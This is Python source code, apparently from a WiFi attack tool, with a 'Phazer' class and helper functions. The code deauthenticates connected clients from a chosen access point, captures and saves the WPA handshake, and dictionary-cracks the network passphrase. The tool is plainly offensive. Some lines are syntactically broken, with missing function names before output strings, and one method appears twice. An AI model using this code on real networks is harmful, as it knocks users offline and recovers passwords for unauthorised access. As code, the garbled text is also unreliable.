def crack_shoot(self, _tgt, _hd=False): if not _hd: _crk = PSK(self.THEPOL, _tgt['essid'], _tgt['auth'], DICTIONARY, V__, _KEY_) _pass, _pmk, _ptk, _mic = _crk.broot() if _pass: pull.use("Found: %s" % (_pass)) pull.right("PMK: "); print _pmk pull.right("PTK: "); print _ptk pull.right("MIC: "); print _mic else: pull.error("Password not Found! Try enlarging your dictionary!") sys.exit(0) return
def call_PSK(self, eapol, essid, enc): self.psk = PSK(eapol, essid, enc, DICTIONARY, V__, _KEY_) pass__, _PMK_, _KCK_, _MIC_ = self.psk.broot() if pass__: pull.use('Found: %s' % pass__) if V__: pull.right('PMK: ') print _PMK_ pull.right('KCK: ') print _KCK_ pull.right('MIC: ') print _MIC_ return True else: pull.error( "Sorry, but the Password is not in the dictionary. Try enlarging it. " ) return False
class Phazer: def __init__(self, sniffer): self.iface = sniffer.iface1 self.WiFiAP = sniffer.WiFiAP def count_input(self): while True: try: count = pull.question('Enter Your Target Number [q]uit/[n]: ') return count except: pass def get_input(self): while True: count = self.count_input() if count == 'q' or count == 'Q': sys.exit(0) for AP in self.WiFiAP: if str(AP['count']) == count: return AP def call_PSK(self, eapol, essid, enc): self.psk = PSK(eapol, essid, enc, DICTIONARY, V__, _KEY_) pass__, _PMK_, _KCK_, _MIC_ = self.psk.broot() if pass__: pull.use('Found: %s' % pass__) if V__: pull.right('PMK: ') print _PMK_ pull.right('KCK: ') print _KCK_ pull.right('MIC: ') print _MIC_ return True else: pull.error( "Sorry, but the Password is not in the dictionary. Try enlarging it. " ) return False def discard_p_hand(self, bss): f_name = 'handshakes' filename = bss.replace(':', '').lower() if os.path.isfile( os.path.join(os.getcwd(), f_name, '%s.cap' % filename)): os.remove(os.path.join(os.getcwd(), f_name, '%s.cap' % filename)) return 1 else: return 0 def verify_h_crack(self, bss): f_name = 'handshakes' tgt__ = bss.replace(':', '').lower() self.c_v_path(os.path.join(os.getcwd(), f_name)) if not os.path.isfile( os.path.join(os.getcwd(), f_name, '%s.cap' % (tgt__))): return (False, None) else: return (True, os.path.join(os.getcwd(), f_name, '%s.cap' % (tgt__))) def h_crack(self, ap, p_to_h): if V__: pull.up('Reading Packets from Captured File: %s'\ % p_to_h) pkts = rdpcap(p_to_h) gen = eAPoL(ap['bssid']) for pkt in pkts: comp__ = gen.check(pkt) if comp__: if V__:'Valid Handshake Found. Manipulaing Data ...') pull.right('AP Manufacturer: %s' % (org(ap['bssid']).org)) break pols = gen.get_pols() self.call_PSK(pols, ap['essid'], ap['auth']) def d_h_crack(self, ap, timeout): global WRITE__ y_h = False while not y_h: pull.up( 'Locating Clients from AP to generate handshake. Sleeping for %d Seconds. ' % timeout) self.sniper = Sniper(self.iface, ap['bssid'], ap['essid'], ap['channel'], timeout) self.sniper.cl_generator() cls__ = self.sniper.clients()'Clients Detected. Number of Connected Users: %d' % len(cls__)) if cls__: for tup in cls__: if V__: pull.up('Attempting to Dissociate %s from AP. Detected Range: %d'\ % (color.RED+tup[0].upper()+color.END, tup[1] if tup[1] != -999 else -1)) else: pull.up('Attempting to Dissociate %s from Access Point.'\ % (color.RED+tup[0].upper()+color.END)) pkts__ = self.sniper.shoot(tup[0]) if V__: pull.up('Checking For Valid Handshake b/w "%s" and "%s"'\ % (color.BOLD+ap['essid']+color.END, color.BOLD+tup[0].upper()+color.END)) if pkts__[0]: y_h = not False if V__: pull.use('Handshake SucessFull. MAC: %s' % tup[0].upper()) pull.right('Vendor (AP): %s Vendor (Client): %s'\ % (org(ap['bssid']).org, org(tup[0]).org) ) else: pull.use( 'Handshake Got Successful. Attempting to Save it. ' ) if WRITE__: h_path = self.save_handshake( pkts__[1], ap['bssid']) if V__:'Saved handshake in %s' % h_path) if self.call_PSK(pkts__[1], ap['essid'], ap['auth']): sys.exit(0) else: pull.error( 'No Handshake Found. Skippingg to Next Client ...') time.sleep(2) else: pull.error( 'Sorry, but shutting Down. No connected users found in the target network.' ) sys.exit(0) def save_handshake(self, pkts, bss): f_name = 'handshakes' fi_name = '%s.cap' % (bss.replace(':', '').lower()) self.c_v_path(os.path.join(os.getcwd(), f_name)) file__ = PcapWriter(os.path.join(os.getcwd(), f_name, fi_name), append=True, sync=True) for pkt in pkts: file__.write(pkt) file__.close() return os.path.join(os.getcwd(), f_name, fi_name) def c_v_path(self, directory): if not os.path.exists(directory): os.makedirs(directory)